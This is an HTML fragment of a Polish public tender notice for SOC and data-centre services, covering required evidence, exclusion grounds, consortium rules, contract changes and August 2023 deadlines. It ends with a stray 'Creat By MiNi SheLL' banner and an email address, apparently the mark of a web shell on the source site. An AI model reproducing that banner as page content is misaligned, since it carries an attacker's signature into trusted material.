będzie dysponował na etapie wykonania zamówienia centrum przetwarzania danych spełniającym co<br/>najmniej wszystkie wymagania CPD wskazane w załączniku nr 1 do SIWZ – OPZ.<br/>3. W pozostałym zakresie Zamawiający nie ustanawia minimalnych poziomów zdolności. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca w celu wykazania braku podstaw do wykluczenia, o których mowa w Rozdziale VII oraz na potwierdzenie spełniania<br/>warunków udziału w postępowaniu, o których mowa w Rozdziale VIII zobowiązany będzie złożyć oświadczenie o niepodleganiu<br/>wykluczeniu i spełnianiu warunków udziału w postępowaniu na wzorze, stanowiącym załącznik nr 3 do SWZ - dokument składany<br/>wraz z ofertą. W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu, Zamawiający, w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, wezwie wykonawcę, którego oferta została najwyżej oceniona, do<br/>złożenia następujących podmiotowych środków dowodowych, aktualnych na dzień ich złożenia:<br/>2.1 zamiast podmiotowych środków dowodowych, o których mowa w § 2 ust. 1 pkt 1, 2 lub 4-6 Rozporządzenia w sprawie<br/>podmiotowych środków dowodowych, żąda oświadczenia Wy-konawcy o aktualności informacji zawartych w oświadczeniu, o którym<br/>mowa w art. 125 ust. 1 Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, tj. oświadczenie<br/>winno odnosić się do podstaw wykluczenia, o których mowa w:<br/>art. 108 ust. 1 pkt 1 i 2 ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych, zwanej dalej &#34;ustawą&#34;,<br/>art. 108 ust. 1 pkt 4 ustawy, dotyczącej orzeczenia zakazu ubiegania się o zamówienie pu-bliczne tytułem środka karnego<br/>art. 108 ust. 1 pkt 5 ustawy - oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej<br/>grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i<br/>1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu,<br/>albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej;<br/>2.2. oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp, w zakresie<br/>podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w: art. 108 ust. 1 pkt 3 Pzp, art. 108 ust. 1<br/>pkt 4 Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, art. 108 ust. 1<br/>pkt 5 Pzp, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji, art. 108 ust. 1 pkt 6<br/>Pzp, tj. informacje zawarte w oświadczeniu winny potwierdzać brak podstaw do wykluczenia, o których mowa w:<br/>a) art. 108 ust. 1 pkt 3 ustawy,<br/>b) art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6 ustawy,<br/>2.3. oświadczenia wykonawcy w zakresie braku podstaw do wykluczenia, o których mowa w art. 5k Rozporządzenia Rady (UE) nr<br/>833/2014 z dnia 31 lipca 2014 r. dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie (Dz. U. UE. L. z 2014 r. Nr 229, str. 1 z późn. zm.), art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego<br/>(Dz.U. z 2022 r. poz. 835 ze zm.).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia<br/>spełniania warunków udziału w postępowaniu Zamawiający, w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania,<br/>wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia następujących podmiotowych środków dowodowych,<br/>aktualnych na dzień ich złożenia:<br/>a) sporządzonego wg załącznika nr 5 do SWZ Wykaz usług wykonanych lub wykonywanych (w przypadku świadczeń okresowych<br/>lub ciągłych) w okresie ostatnich 4 (czterech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy w tym okresie, obejmującego:<br/>co najmniej jedną usługę o wartości minimum 500.000,00 zł brutto polegający na realizacji rozwiązania informatycznego<br/>dotyczącego usługi SOC, lub co najmniej trzy usługi o wartości co najmniej 400.000,00 zł brutto każda, polegających na świadczeniu usług udostępniania<br/>infrastruktury teleinformatycznej centrum przetwarzania danych wraz z mocą obliczeniową;<br/>wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane lub są wykonywane<br/>należycie<br/>b) dowodów określających, czy usługi te zostały wykonane należycie. Dowodami, o których mowa powyżej, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane lub są wykonywane, a jeżeli wykonawca z<br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy. Wykonawca nie jest<br/>zobowiązany do przedłożenia dokumentów, które dotyczyłyby zamówień wykonanych na rzecz Zamawiającego. W przypadku usług<br/>nadal wykonywanych (świadczeń okresowych lub ciągłych) referencje lub inne dokumenty potwierdzające ich należyte wykonanie<br/>powinny być wystawione w okresie ostatnich trzech miesięcy.<br/>W przypadku, gdy wartości usług wskazanych w wykazach, będą wyrażone w innych walutach niż Polski Złoty (PLN) muszą zostać<br/>one przeliczone przez wykonawcę wg odpowiednio Tabeli A lub Tabeli B kursów średnich walut obcych Narodowego Banku<br/>Polskiego aktualnej na dzień publikacji ogłoszenia o zamówieniu.<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi wykonawcami, wykaz o<br/>którym mowa w pkt a) dotyczy usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń<br/>powtarzających się lub ciągłych w których wykonywaniu uczestniczył lub uczestniczy.<br/>Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1,<br/>dane umożliwiające dostęp do tych środków.<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, dokumenty i oświadczenia,<br/>składa także podmiot udostepniający zasoby.<br/>Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, o których mowa w niniejszym rozdziale składa się zgodnie z<br/>wymogami określonymi w treści przepisów wydanych na podstawie art. 70 ustawy Pzp.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> - lista kontrolna wymogów technicznych, stanowiąca załącznik nr 1 do SWZ;<br/>- aktualne certyfikaty - w celu umożliwienia dokonania oceny oferty z zastosowaniem ustalonego kryterium oceny ofert:<br/>Standard świadczonych usług <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie.<br/>Postanowień nie stosuje się, jeżeli przedmiotowy środek dowodowy służy potwierdzaniu zgodności z cechami lub kryteriami<br/>określonymi w opisie kryteriów oceny ofert lub, pomimo złożenia przedmiotowego środka dowodowego, oferta podlega<br/>odrzuceniu albo zachodzą przesłanki unieważnienia postępowania. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć:<br/>a) formularz ofertowy – wzór formularza stanowi załącznik nr 2 do SWZ;<br/>b) pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>c) pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>d) oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania oraz o spełnianiu warunków udziału w<br/>postępowaniu - wzór oświadczenia o niepodleganiu wykluczeniu stanowi załącznik nr 3 do SWZ, (oświadczenie dotyczące<br/>podmiotu trzeciego zostało zawarte w załączniku nr 3a do SWZ);<br/>e) zobowiązanie, o którym mowa w Rozdziale XI ust. 2 SWZ;<br/>f) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego<br/>reprezentowania;<br/>g) lista kontrolna wymogów technicznych, stanowiąca załącznik nr 1 do SWZ;<br/>h) aktualne certyfikaty - w celu umożliwienia dokonania oceny oferty z zastosowaniem ustalonego kryterium oceny ofert:<br/>Standard świadczonych usług;<br/>20. Oferta oraz oświadczenie o niepodleganiu wykluczeniu muszą być złożone w oryginale.<br/>21. Pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym. W przypadku gdy zostały sporządzone jako dokument w postaci papierowej i<br/>opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczające zgodność cyfrowego<br/>odwzorowania z dokumentem w postaci papierowej. Przez cyfrowe odwzorowanie, należy rozumieć dokument elektroniczny<br/>będący kopią elektroniczną treści zapisanej w postaci papierowej, umożliwiający zapoznanie się z tą treścią i jej<br/>zrozumienie, bez konieczności bezpośredniego dostępu do oryginału. Poświadczenia zgodności cyfrowego odwzorowania z<br/>dokumentem w postaci papierowej dokonuje odpowiednio Wykonawca, Wykonawca wspólnie ubiegający się o udzielenie<br/>zamówienia, podmiot udostępniający zasoby lub podwykonawca, w zakresie dokumentów potwierdzających umocowanie do<br/>reprezentowania, które każdego z nich dotyczą lub notariusz. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>2. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt 1, powinno potwierdzać, że stosunek łączący<br/>wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określać w<br/>szczególności:<br/>a) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą.<br/>3. W odniesieniu do warunków dotyczących doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia,<br/>mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>usługi wykonają ci poszczególni wykonawcy.<br/>4. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, wykonawcy ustanawiają pełnomocnika<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego. Forma i sposób złożenia pełnomocnictwa została wskazana w pkt 9.<br/>5. W celu potwierdzenia, że osoba działająca w imieniu wykonawcy, wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, podmiotu udostępniającego zasoby jest umocowana do jego reprezentowania, Zamawiający żąda od<br/>wykonawcy odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru lub wskazania danych umożliwiających Zamawiającemu dostęp do tych<br/>dokumentów.<br/>6. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w pkt 5 jeżeli Zamawiający może je uzyskać<br/>za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych<br/>dokumentów np. w treści Formularza ofertowego.<br/>7. Jeżeli w imieniu wykonawcy, wykonawców wspólnie ubiegających się o udzielenie zamówienia, podmiotu<br/>udostępniającego zasoby działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których<br/>mowa w pkt 5, Zamawiający żąda od wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do<br/>reprezentowania wykonawcy.<br/>8. Jeżeli wykonawca nie złoży wymaganych pełnomocnictw albo złożył wadliwe pełnomocnictwa, Zamawiający wezwie do<br/>ich złożenia w terminie przez siebie wskazanym, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo<br/>konieczne byłoby unieważnienie postępowania.<br/>9. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, o których mowa w SWZ, składa się w formie<br/>elektronicznej w zakresie i w sposób określony w przepisach wydanych na podstawie art. 70 ustawy Pzp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany Umowy wymagają formy pisemnego aneksu pod rygorem nieważności z wy-jątkiem zmiany osób<br/>odpowiedzialnych za realizację umowy, o których mowa w § 7 ust. 6 Umowy, kiedy wystarczające jest poinformowanie<br/>pisemnie drugiej strony.<br/>2. Zmiana Umowy musi być zgodna z ustawą Pzp.<br/>3. Zmiana Umowy dokonana z naruszeniem ust. 2 podlega unieważnieniu.<br/>4. Strony przewidują możliwość wprowadzenia zmian do Umowy w przypadku gdy:<br/>a) nastąpiła zmiana przepisów prawa powszechnie obowiązującego, która ma wpływ na termin lub zakres realizacji<br/>przedmiotu Umowy;<br/>b) niezbędne jest zmniejszenie wynagrodzenia Wykonawcy, określonego w § 3 Umowy lub zasad płatności tego<br/>wynagrodzenia w przypadku zmiany zakresu przedmiotu Umowy określonego w pkt 1 – 2;<br/>c) nastąpi zmiana:<br/> stawki podatku od towarów i usług;<br/> wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalanych na podstawie<br/>przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz. U. z 2018 r. poz. 2177, z późn.<br/>zm.),<br/> zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wy-sokości stawki składki na<br/>ubezpieczenia społeczne lub zdrowotne,<br/> zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o któ-rych mowa w ustawie z dnia 4<br/>października 2018 r. o pracowniczych planach kapitało-wych (Dz. U z 2018 r. poz. 2215, z późn. zm.);<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę;<br/>5. Strona wnosząca o zmianę Umowy, o której mowa w ust. 4, zobowiązana jest do przekazania na piśmie warunków<br/>zmiany wraz z uzasadnieniem w terminie 5 dni od daty zaistnienia oko-liczności i proponowanego terminu wprowadzenia<br/>zmiany.<br/>6. Strony ustalają, że w przypadku zaistnienia okoliczności, o których mowa w ust. 4 lit c), Wykonawca może wystąpić do<br/>Zamawiającego w terminie 30 dni od daty wprowadzenia zmiany z wnioskiem o zmianę wynagrodzenia, przedkładając<br/>odpowiednie dokumenty potwierdzają-ce zasadność złożenia takiego wniosku. Wykonawca powinien wykazać ponad<br/>wszelką wątpliwość, że zaistniała zmiana ma bezpośredni wpływ na koszty wykonania przedmiotu Umowy oraz określić<br/>stopień, w jakim wpłynie ona na wysokość wynagrodzenia.<br/>7. W terminie nie dłuższym niż 5 dni roboczych od daty wpływu wniosku, o którym mowa w ust. 6, Strony podejmują<br/>negocjacje w zakresie zmiany wynagrodzenia. Przez dni robocze należy rozumieć dni od poniedziałku do piątku, z<br/>wyłączeniem dni ustawowo wolnych od pracy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/kpfp</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-16 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-09-14</span></h3> <h3 class="mb-0">8.19.) Umowa ramowa: </h3> Umowa ramowa zawarta zostanie z jednym wykonawcą <h3 class="mb-0">8.20.) Przewiduje się ograniczenie liczby uczestników umowy ramowej: <span class="normal">Nie</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com